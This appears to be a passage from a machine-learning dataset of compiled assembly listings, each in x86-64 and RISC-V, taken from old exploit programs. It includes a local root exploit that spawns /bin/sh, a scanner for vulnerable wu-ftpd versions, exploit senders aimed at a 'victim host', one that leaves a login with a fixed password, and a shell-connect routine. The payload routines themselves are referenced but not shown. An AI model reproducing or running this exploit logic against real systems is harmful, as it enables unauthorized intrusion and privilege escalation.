a1,s0 mv a0,s2 call select@plt ble a0,zero,.L27 mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L27 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt j .L31 .L37: li s1,133 j .L3 .L39: li s1,134 j .L3 .L14: li s1,129 j .L3 .L93: lla a1,.LC4 mv a0,s4 call strstr@plt beq a0,zero,.L85 ld a1,8(sp) mv a0,s4 call strstr@plt beq a0,zero,.L85 lla a0,.LC5 call puts@plt j .L85 .L30: li s1,131 j .L3 .L92: call __stack_chk_fail@plt .size attack, .-attack .globl stderr .bss .align 2 .set .LANCHOR0,. + 0 .type stderr, @object .size stderr, 4 stderr: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_11112.c_print_aug_v3_4
.file "extr_11112.c_print_aug_v3_4.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "\n[*]%s\n" .text .p2align 4 .globl print .type print, @function print: .LFB1: .cfi_startproc endbr64 movq %rdi, %rsi leaq .LC0(%rip), %rdi jmp printf@PLT .cfi_endproc .LFE1: .size print, .-print .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_11112.c_print_aug_v3_4.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "\n[*]%s\n" .text .align 1 .globl print .type print, @function print: mv a1,a0 lla a0,.LC0 tail printf@plt .size print, .-print .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_9083.c_trigger_fault_aug_v3_8
.file "extr_9083.c_trigger_fault_aug_v3_8.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "/bin/sh" .LC1: .string "/proc/timer_list" .LC2: .string "[**] Got root!\n" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC3: .string "[**] Cannot open /proc/timer_list" .text .p2align 4 .type trigger_fault, @function trigger_fault: .LFB24: .cfi_startproc endbr64 pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 leaq .LC1(%rip), %rdi leaq .LC0(%rip), %rbp pushq %rbx .cfi_def_cfa_offset 24 .cfi_offset 3, -24 subq $40, %rsp .cfi_def_cfa_offset 64 movl O_RDONLY(%rip), %esi movq %fs:40, %rax movq %rax, 24(%rsp) xorl %eax, %eax movq %rbp, (%rsp) movq $0, 8(%rsp) call open@PLT testl %eax, %eax jle .L2 movl %eax, %edi xorl %edx, %edx xorl %esi, %esi xorl %ebx, %ebx call ioctl@PLT xorl %eax, %eax call __free_stuff@PLT xorl %eax, %eax call migrate_evil_fd@PLT .L3: movq unsafe_fd(%rip), %rax movl (%rax,%rbx), %edi addq $4, %rbx call close@PLT cmpq $16, %rbx jne .L3 xorl %eax, %eax call getuid@PLT testl %eax, %eax je .L9 .L1: movq 24(%rsp), %rax subq %fs:40, %rax jne .L10 addq $40, %rsp .cfi_remember_state .cfi_def_cfa_offset 24 popq %rbx .cfi_def_cfa_offset 16 popq %rbp .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L2: .cfi_restore_state leaq .LC3(%rip), %rdi call __msg@PLT xorl %eax, %eax call __free_stuff@PLT jmp .L1 .p2align 4,,10 .p2align 3 .L9: leaq .LC2(%rip), %rdi call __msg@PLT movq %rsp, %rsi xorl %edx, %edx movq %rbp, %rdi call execve@PLT jmp .L1 .L10: call __stack_chk_fail@PLT .cfi_endproc .LFE24: .size trigger_fault, .-trigger_fault .globl unsafe_fd .bss .align 8 .type unsafe_fd, @object .size unsafe_fd, 8 unsafe_fd: .zero 8 .globl O_RDONLY .align 4 .type O_RDONLY, @object .size O_RDONLY, 4 O_RDONLY: .zero 4 .globl g_aug_volatile_4660 .data .align 4 .type g_aug_volatile_4660, @object .size g_aug_volatile_4660, 4 g_aug_volatile_4660: .long 1 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_9083.c_trigger_fault_aug_v3_8.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "/bin/sh" .align 3 .LC1: .string "/proc/timer_list" .align 3 .LC2: .string "[**] Got root!\n" .align 3 .LC3: .string "[**] Cannot open /proc/timer_list" .text .align 1 .type trigger_fault, @function trigger_fault: addi sp,sp,-80 sd s1,56(sp) lla s1,.LANCHOR0 sd s2,48(sp) lw a1,0(s1) la s2,__stack_chk_guard ld a5, 0(s2) sd a5, 24(sp) li a5, 0 lla a5,.LC0 lla a0,.LC1 sd ra,72(sp) sd s0,64(sp) sd s3,40(sp) sd a5,8(sp) sd zero,16(sp) call open@plt ble a0,zero,.L2 li a2,0 li a1,0 call ioctl@plt call __free_stuff@plt call migrate_evil_fd@plt li s0,0 li s3,16 .L3: ld a5,8(s1) add a5,a5,s0 lw a0,0(a5) addi s0,s0,4 call close@plt bne s0,s3,.L3 call getuid@plt beq a0,zero,.L9 .L1: ld a4, 24(sp) ld a5, 0(s2) xor a5, a4, a5 li a4, 0 bne a5,zero,.L10 ld ra,72(sp) ld s0,64(sp) ld s1,56(sp) ld s2,48(sp) ld s3,40(sp) addi sp,sp,80 jr ra .L2: lla a0,.LC3 call __msg@plt call __free_stuff@plt j .L1 .L9: lla a0,.LC2 call __msg@plt li a2,0 addi a1,sp,8 lla a0,.LC0 call execve@plt j .L1 .L10: call __stack_chk_fail@plt .size trigger_fault, .-trigger_fault .globl unsafe_fd .globl O_RDONLY .globl g_aug_volatile_4660 .data .align 2 .type g_aug_volatile_4660, @object .size g_aug_volatile_4660, 4 g_aug_volatile_4660: .word 1 .bss .align 3 .set .LANCHOR0,. + 0 .type O_RDONLY, @object .size O_RDONLY, 4 O_RDONLY: .zero 4 .zero 4 .type unsafe_fd, @object .size unsafe_fd, 8 unsafe_fd: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_22975.c_bscann_aug_v3_5
.file "extr_22975.c_bscann_aug_v3_5.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "\n [+] Checking, banner ...\n" .LC1: .string "wu-2.6.0" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC2: .string " [*] [wu-ftpd-2.6.0]: This is version that exploit is possible.\n\n" .section .rodata.str1.1 .LC3: .string "wu-2.6.1" .section .rodata.str1.8 .align 8 .LC4: .string " [*] [wu-ftpd-2.6.1]: This is version that exploit is possible.\n\n" .section .rodata.str1.1 .LC5: .string "wu-2.6.2" .section .rodata.str1.8 .align 8 .LC6: .string " [*] [wu-ftpd-2.6.2]: This is version that exploit is possible.\n\n" .align 8 .LC7: .string " [x] This version does not support exploit.\n" .text .p2align 4 .globl bscann .type bscann, @function bscann: .LFB0: .cfi_startproc endbr64 pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 movq %rdi, %rbp movl stdout(%rip), %edi leaq .LC0(%rip), %rsi call fprintf@PLT leaq .LC1(%rip), %rsi movq %rbp, %rdi call strstr@PLT testq %rax, %rax jne .L8 leaq .LC3(%rip), %rsi movq %rbp, %rdi call strstr@PLT testq %rax, %rax jne .L9 leaq .LC5(%rip), %rsi movq %rbp, %rdi call strstr@PLT testq %rax, %rax je .L5 movl stdout(%rip), %edi leaq .LC6(%rip), %rsi call fprintf@PLT movl SCS(%rip), %eax popq %rbp .cfi_remember_state .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L9: .cfi_restore_state movl stdout(%rip), %edi leaq .LC4(%rip), %rsi call fprintf@PLT movl SCS(%rip), %eax popq %rbp .cfi_remember_state .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L8: .cfi_restore_state movl stdout(%rip), %edi leaq .LC2(%rip), %rsi call fprintf@PLT movl SCS(%rip), %eax popq %rbp .cfi_remember_state .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L5: .cfi_restore_state movl stdout(%rip), %edi leaq .LC7(%rip), %rsi call fprintf@PLT movl FAD(%rip), %eax popq %rbp .cfi_def_cfa_offset 8 ret .cfi_endproc .LFE0: .size bscann, .-bscann .globl stdout .bss .align 4 .type stdout, @object .size stdout, 4 stdout: .zero 4 .globl SCS .align 4 .type SCS, @object .size SCS, 4 SCS: .zero 4 .globl FAD .align 4 .type FAD, @object .size FAD, 4 FAD: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_22975.c_bscann_aug_v3_5.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "\n [+] Checking, banner ...\n" .align 3 .LC1: .string "wu-2.6.0" .align 3 .LC2: .string " [*] [wu-ftpd-2.6.0]: This is version that exploit is possible.\n\n" .align 3 .LC3: .string "wu-2.6.1" .align 3 .LC4: .string " [*] [wu-ftpd-2.6.1]: This is version that exploit is possible.\n\n" .align 3 .LC5: .string "wu-2.6.2" .align 3 .LC6: .string " [*] [wu-ftpd-2.6.2]: This is version that exploit is possible.\n\n" .align 3 .LC7: .string " [x] This version does not support exploit.\n" .text .align 1 .globl bscann .type bscann, @function bscann: addi sp,sp,-32 sd s1,8(sp) lla s1,.LANCHOR0 sd s0,16(sp) mv s0,a0 lw a0,0(s1) lla a1,.LC0 sd ra,24(sp) call fprintf@plt lla a1,.LC1 mv a0,s0 call strstr@plt bne a0,zero,.L8 lla a1,.LC3 mv a0,s0 call strstr@plt bne a0,zero,.L9 lla a1,.LC5 mv a0,s0 call strstr@plt beq a0,zero,.L5 lw a0,0(s1) lla a1,.LC6 call fprintf@plt ld ra,24(sp) ld s0,16(sp) lw a0,4(s1) ld s1,8(sp) addi sp,sp,32 jr ra .L9: lw a0,0(s1) lla a1,.LC4 call fprintf@plt ld ra,24(sp) ld s0,16(sp) lw a0,4(s1) ld s1,8(sp) addi sp,sp,32 jr ra .L8: lw a0,0(s1) lla a1,.LC2 call fprintf@plt ld ra,24(sp) ld s0,16(sp) lw a0,4(s1) ld s1,8(sp) addi sp,sp,32 jr ra .L5: lw a0,0(s1) lla a1,.LC7 call fprintf@plt ld ra,24(sp) ld s0,16(sp) lw a0,8(s1) ld s1,8(sp) addi sp,sp,32 jr ra .size bscann, .-bscann .globl stdout .globl SCS .globl FAD .bss .align 2 .set .LANCHOR0,. + 0 .type stdout, @object .size stdout, 4 stdout: .zero 4 .type SCS, @object .size SCS, 4 SCS: .zero 4 .type FAD, @object .size FAD, 4 FAD: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_25904.c_main_aug_v3_6
.file "extr_25904.c_main_aug_v3_6.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "clear" .LC1: .string "[*] Creating socket [OK]" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC2: .string "[*] Resolving victim host [OK]" .align 8 .LC3: .string "[*] Connecting at victim host [OK]\n" .section .rodata.str1.1 .LC4: .string "a" .LC5: .string "[*] Sending exploit [OK]" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 movq %rsi, %r12 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 subq $32, %rsp .cfi_def_cfa_offset 80 movq %fs:40, %rax movq %rax, 24(%rsp) movl g_aug_volatile_6315(%rip), %eax addl $1, %eax movl %eax, g_aug_volatile_6315(%rip) cmpl $5, %edi je .L10 .L2: movq 32(%r12), %rdi call atoi@PLT movl %eax, %r14d cmpl $3, %eax ja .L11 .L3: movl SOCK_STREAM(%rip), %esi movl AF_INET(%rip), %edi xorl %edx, %edx call socket@PLT movl %eax, %ebp testl %eax, %eax js .L12 .L4: leaq .LC0(%rip), %rdi call system@PLT leaq .LC1(%rip), %rdi call puts@PLT movq 8(%r12), %rdi call gethostbyname@PLT movq %rax, %r13 testq %rax, %rax je .L13 .L5: leaq .LC2(%rip), %rdi leaq 12(%rsp), %r15 call puts@PLT xorl %esi, %esi movl $12, %edx movq %r15, %rdi call memset@PLT movl 4(%r13), %esi movl 0(%r13), %edx leaq 20(%rsp), %rdi call memcpy@PLT movl AF_INET(%rip), %eax movl PORT(%rip), %edi movl %eax, 16(%rsp) call htons@PLT movl $12, %edx movq %r15, %rsi movl %ebp, %edi movl %eax, 12(%rsp) call connect@PLT testl %eax, %eax js .L14 .L6: movq 8(%r12), %rsi leaq .LC3(%rip), %rdi xorl %eax, %eax call printf@PLT leaq .LC4(%rip), %rsi movl %ebp, %edi call fdopen@PLT xorl %esi, %esi movq %rax, %r13 movq %rax, %rdi call setbuf@PLT movl %r14d, %edx movq %r12, %rsi movq %r13, %rdi call sendxpl@PLT leaq .LC5(%rip), %rdi call puts@PLT movq %r12, %rsi movl %ebp, %edi call readout@PLT movl $2, %esi movl %ebp, %edi call shutdown@PLT movl %ebp, %edi call close@PLT movq %r13, %rdi call fclose@PLT movq 24(%rsp), %rax subq %fs:40, %rax jne .L15 addq $32, %rsp .cfi_remember_state .cfi_def_cfa_offset 48 xorl %eax, %eax popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .L11: .cfi_restore_state xorl %eax, %eax call info@PLT jmp .L3 .L14: xorl %eax, %eax call errconn@PLT jmp .L6 .L12: xorl %eax, %eax call errsock@PLT jmp .L4 .L10: xorl %eax, %eax call info@PLT jmp .L2 .L13: xorl %eax, %eax call errgeth@PLT jmp .L5 .L15: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size main, .-main .globl SOCK_STREAM .bss .align 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .globl PORT .align 4 .type PORT, @object .size PORT, 4 PORT: .zero 4 .globl AF_INET .align 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .globl g_aug_volatile_6315 .data .align 4 .type g_aug_volatile_6315, @object .size g_aug_volatile_6315, 4 g_aug_volatile_6315: .long 3 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_25904.c_main_aug_v3_6.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "clear" .align 3 .LC1: .string "[*] Creating socket [OK]" .align 3 .LC2: .string "[*] Resolving victim host [OK]" .align 3 .LC3: .string "[*] Connecting at victim host [OK]\n" .align 3 .LC4: .string "a" .align 3 .LC5: .string "[*] Sending exploit [OK]" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-96 sd s6,32(sp) la s6,__stack_chk_guard ld a5, 0(s6) sd a5, 24(sp) li a5, 0 lw a5,.LANCHOR0 addiw a5,a5,1 sd s1,72(sp) sw a5,.LANCHOR0,a4 sd ra,88(sp) sd s0,80(sp) sd s2,64(sp) sd s3,56(sp) sd s4,48(sp) sd s5,40(sp) li a5,5 mv s1,a1 beq a0,a5,.L10 .L2: ld a0,32(s1) call atoi@plt sext.w a4,a0 li a5,3 mv s3,a0 bgtu a4,a5,.L11 .L3: lla s5,.LANCHOR1 lw a1,0(s5) lw a0,4(s5) li a2,0 call socket@plt mv s0,a0 blt a0,zero,.L12 .L4: lla a0,.LC0 call system@plt lla a0,.LC1 call puts@plt ld a0,8(s1) call gethostbyname@plt mv s2,a0 beq a0,zero,.L13 .L5: lla a0,.LC2 call puts@plt addi s4,sp,8 li a2,12 li a1,0 mv a0,s4 call memset@plt lw a2,0(s2) lw a1,4(s2) addi a0,sp,16 call memcpy@plt lw a5,4(s5) lw a0,8(s5) sw a5,12(sp) call htons@plt mv a5,a0 li a2,12 mv a1,s4 mv a0,s0 sw a5,8(sp) call connect@plt blt a0,zero,.L14 .L6: ld a1,8(s1) lla a0,.LC3 call printf@plt lla a1,.LC4 mv a0,s0 call fdopen@plt li a1,0 mv s2,a0 call setbuf@plt mv a2,s3 mv a1,s1 mv a0,s2 call sendxpl@plt lla a0,.LC5 call puts@plt mv a1,s1 mv a0,s0 call readout@plt li a1,2 mv a0,s0 call shutdown@plt mv a0,s0 call close@plt mv a0,s2 call fclose@plt ld a4, 24(sp) ld a5, 0(s6) xor a5, a4, a5 li a4, 0 bne a5,zero,.L15 ld ra,88(sp) ld s0,80(sp) ld s1,72(sp) ld s2,64(sp) ld s3,56(sp) ld s4,48(sp) ld s5,40(sp) ld s6,32(sp) li a0,0 addi sp,sp,96 jr ra .L11: call info@plt j .L3 .L14: call errconn@plt j .L6 .L12: call errsock@plt j .L4 .L10: call info@plt j .L2 .L13: call errgeth@plt j .L5 .L15: call __stack_chk_fail@plt .size main, .-main .globl SOCK_STREAM .globl PORT .globl AF_INET .globl g_aug_volatile_6315 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_6315, @object .size g_aug_volatile_6315, 4 g_aug_volatile_6315: .word 3 .bss .align 2 .set .LANCHOR1,. + 0 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .type PORT, @object .size PORT, 4 PORT: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_866.c_main_aug_v3_1
.file "extr_866.c_main_aug_v3_1.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "clear" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC1: .string "[*] Creating socket [OK]" .align 8 .LC2: .string "[*] Resolving victim host [OK]" .align 8 .LC3: .string "[*] Connecting at victim host [OK]" .align 8 .LC4: .string "[*] Now check on\n http://%s%s\n\n your username: %s\n with password: anacron\n\n" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB1: .cfi_startproc endbr64 pushq %r13 .cfi_def_cfa_offset 16 .cfi_offset 13, -16 pushq %r12 .cfi_def_cfa_offset 24 .cfi_offset 12, -24 pushq %rbp .cfi_def_cfa_offset 32 .cfi_offset 6, -32 pushq %rbx .cfi_def_cfa_offset 40 .cfi_offset 3, -40 movq %rsi, %rbx subq $40, %rsp .cfi_def_cfa_offset 80 movq %fs:40, %rax movq %rax, 24(%rsp) movl g_aug_volatile_1977(%rip), %eax addl $1, %eax movl %eax, g_aug_volatile_1977(%rip) cmpl $4, %edi je .L9 .L2: movl SOCK_STREAM(%rip), %esi movl AF_INET(%rip), %edi xorl %edx, %edx call socket@PLT movl %eax, %ebp testl %eax, %eax js .L10 .L3: leaq .LC0(%rip), %rdi call system@PLT leaq .LC1(%rip), %rdi call puts@PLT movq 8(%rbx), %rdi call gethostbyname@PLT movq %rax, %r12 testq %rax, %rax je .L11 .L4: leaq .LC2(%rip), %rdi leaq 12(%rsp), %r13 call puts@PLT xorl %esi, %esi movl $12, %edx movq %r13, %rdi call memset@PLT movl 4(%r12), %esi movl (%r12), %edx leaq 20(%rsp), %rdi call memcpy@PLT movl AF_INET(%rip), %eax movl PORT(%rip), %edi movl %eax, 16(%rsp) call htons@PLT movl $12, %edx movq %r13, %rsi movl %ebp, %edi movl %eax, 12(%rsp) call connect@PLT testl %eax, %eax js .L12 .L5: leaq .LC3(%rip), %rdi call puts@PLT movq %rbx, %rsi movl %ebp, %edi call sendxpl@PLT movq 24(%rbx), %rcx movq 16(%rbx), %rdx xorl %eax, %eax movq 8(%rbx), %rsi leaq .LC4(%rip), %rdi call printf@PLT movl %ebp, %edi movl $2, %esi call shutdown@PLT movl %ebp, %edi call close@PLT movq 24(%rsp), %rax subq %fs:40, %rax jne .L13 addq $40, %rsp .cfi_remember_state .cfi_def_cfa_offset 40 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 32 popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 ret .L10: .cfi_restore_state xorl %eax, %eax call errsock@PLT jmp .L3 .L12: xorl %eax, %eax call errsock@PLT jmp .L5 .L9: xorl %eax, %eax call info@PLT jmp .L2 .L11: xorl %eax, %eax call errgeth@PLT jmp .L4 .L13: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size main, .-main .globl SOCK_STREAM .bss .align 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .globl PORT .align 4 .type PORT, @object .size PORT, 4 PORT: .zero 4 .globl AF_INET .align 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .globl g_aug_volatile_1977 .data .align 4 .type g_aug_volatile_1977, @object .size g_aug_volatile_1977, 4 g_aug_volatile_1977: .long 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_866.c_main_aug_v3_1.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "clear" .align 3 .LC1: .string "[*] Creating socket [OK]" .align 3 .LC2: .string "[*] Resolving victim host [OK]" .align 3 .LC3: .string "[*] Connecting at victim host [OK]" .align 3 .LC4: .string "[*] Now check on\n http://%s%s\n\n your username: %s\n with password: anacron\n\n" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-96 sd s5,40(sp) la s5,__stack_chk_guard ld a5, 0(s5) sd a5, 24(sp) li a5, 0 lw a5,.LANCHOR0 addiw a5,a5,1 sd s1,72(sp) sw a5,.LANCHOR0,a4 sd ra,88(sp) sd s0,80(sp) sd s2,64(sp) sd s3,56(sp) sd s4,48(sp) li a5,4 mv s1,a1 beq a0,a5,.L9 .L2: lla s4,.LANCHOR1 lw a1,0(s4) lw a0,4(s4) li a2,0 call socket@plt mv s0,a0 blt a0,zero,.L10 .L3: lla a0,.LC0 call system@plt lla a0,.LC1 call puts@plt ld a0,8(s1) call gethostbyname@plt mv s2,a0 beq a0,zero,.L11 .L4: lla a0,.LC2 call puts@plt addi s3,sp,8 li a2,12 li a1,0 mv a0,s3 call memset@plt lw a2,0(s2) lw a1,4(s2) addi a0,sp,16 call memcpy@plt lw a5,4(s4) lw a0,8(s4) sw a5,12(sp) call htons@plt mv a5,a0 li a2,12 mv a1,s3 mv a0,s0 sw a5,8(sp) call connect@plt blt a0,zero,.L12 .L5: lla a0,.LC3 call puts@plt mv a1,s1 mv a0,s0 call sendxpl@plt ld a3,24(s1) ld a2,16(s1) ld a1,8(s1) lla a0,.LC4 call printf@plt li a1,2 mv a0,s0 call shutdown@plt mv a0,s0 call close@plt ld a4, 24(sp) ld a5, 0(s5) xor a5, a4, a5 li a4, 0 bne a5,zero,.L13 ld ra,88(sp) ld s0,80(sp) ld s1,72(sp) ld s2,64(sp) ld s3,56(sp) ld s4,48(sp) ld s5,40(sp) li a0,0 addi sp,sp,96 jr ra .L10: call errsock@plt j .L3 .L12: call errsock@plt j .L5 .L9: call info@plt j .L2 .L11: call errgeth@plt j .L4 .L13: call __stack_chk_fail@plt .size main, .-main .globl SOCK_STREAM .globl PORT .globl AF_INET .globl g_aug_volatile_1977 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_1977, @object .size g_aug_volatile_1977, 4 g_aug_volatile_1977: .word 8 .bss .align 2 .set .LANCHOR1,. + 0 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .type PORT, @object .size PORT, 4 PORT: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_3821.c_getshell_conn_aug_v3_7
.file "extr_3821.c_getshell_conn_aug_v3_7.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "getshell_conn(): socket() failed." .align 8 .LC1: .string "getshell_conn(): couldn't resolve." .align 8 .LC2: .string "[*] attempting to connect: %s:%d.\n" .align 8 .LC3: .string "[!] connection failed: %s:%d.\n" .align 8 .LC4: .string "[*] successfully connected: %s:%d.\n\n" .text .p2align 4 .globl getshell_conn .type getshell_conn, @function getshell_conn: .LFB0: .cfi_startproc endbr64 pushq %r13 .cfi_def_cfa_offset 16 .cfi_offset 13, -16 pushq %r12 .cfi_def_cfa_offset 24 .cfi_offset 12, -24 movl %esi, %r12d pushq %rbp .cfi_def_cfa_offset 32 .cfi_offset 6, -32 movq %rdi, %rbp pushq %rbx .cfi_def_cfa_offset 40 .cfi_offset 3, -40 subq $40, %rsp .cfi_def_cfa_offset 80 movl IPPROTO_TCP(%rip), %edx movl SOCK_STREAM(%rip), %esi movq %fs:40, %rax movq %rax, 24(%rsp) xorl %eax, %eax movl AF_INET(%rip), %edi call socket@PLT movl %eax, %r13d cmpl $-1, %eax je .L15 .L2: movl AF_INET(%rip), %eax movq %rbp, %rdi movl %eax, 20(%rsp) call inet_addr@PLT movl %eax, 16(%rsp) testl %eax, %eax jne .L16 .L3: movzwl %r12w, %r12d movl %r12d, %edi call htons@PLT movl sig_alarm(%rip), %esi movl SIGALRM(%rip), %edi movl %eax, 12(%rsp) call signal@PLT movl %r12d, %edx movq %rbp, %rsi leaq .LC2(%rip), %rdi call printf@PLT movl TIMEOUT(%rip), %edi call alarm@PLT leaq 12(%rsp), %rsi movl $12, %edx movl %r13d, %edi call connect@PLT testq %rax, %rax jne .L17 .L5: xorl %edi, %edi call alarm@PLT movl %r12d, %edx movq %rbp, %rsi leaq .LC4(%rip), %rdi call printf@PLT movq 24(%rsp), %rax subq %fs:40, %rax jne .L18 addq $40, %rsp .cfi_remember_state .cfi_def_cfa_offset 40 movl %r13d, %eax popq %rbx .cfi_def_cfa_offset 32 popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L16: .cfi_restore_state movq %rbp, %rdi call gethostbyname@PLT movq %rax, %rbx testq %rax, %rax je .L19 .L4: movq (%rbx), %rsi leaq 16(%rsp), %rdi movl $4, %edx call memcpy@PLT jmp .L3 .p2align 4,,10 .p2align 3 .L17: movl %r12d, %edx movq %rbp, %rsi leaq .LC3(%rip), %rdi call printf@PLT movl $1, %edi call exit@PLT jmp .L5 .p2align 4,,10 .p2align 3 .L15: movl $1, %esi leaq .LC0(%rip), %rdi call printe@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L19: movl $1, %esi leaq .LC1(%rip), %rdi call printe@PLT jmp .L4 .L18: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size getshell_conn, .-getshell_conn .globl sig_alarm .bss .align 4 .type sig_alarm, @object .size sig_alarm, 4 sig_alarm: .zero 4 .globl TIMEOUT .align 4 .type TIMEOUT, @object .size TIMEOUT, 4 TIMEOUT: .zero 4 .globl SOCK_STREAM .align 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .globl SIGALRM .align 4 .type SIGALRM, @object .size SIGALRM, 4 SIGALRM: .zero 4 .globl IPPROTO_TCP .align 4 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .globl AF_INET .align 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .globl g_aug_volatile_7762 .data .align 4 .type g_aug_volatile_7762, @object .size g_aug_volatile_7762, 4 g_aug_volatile_7762: .long 6 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
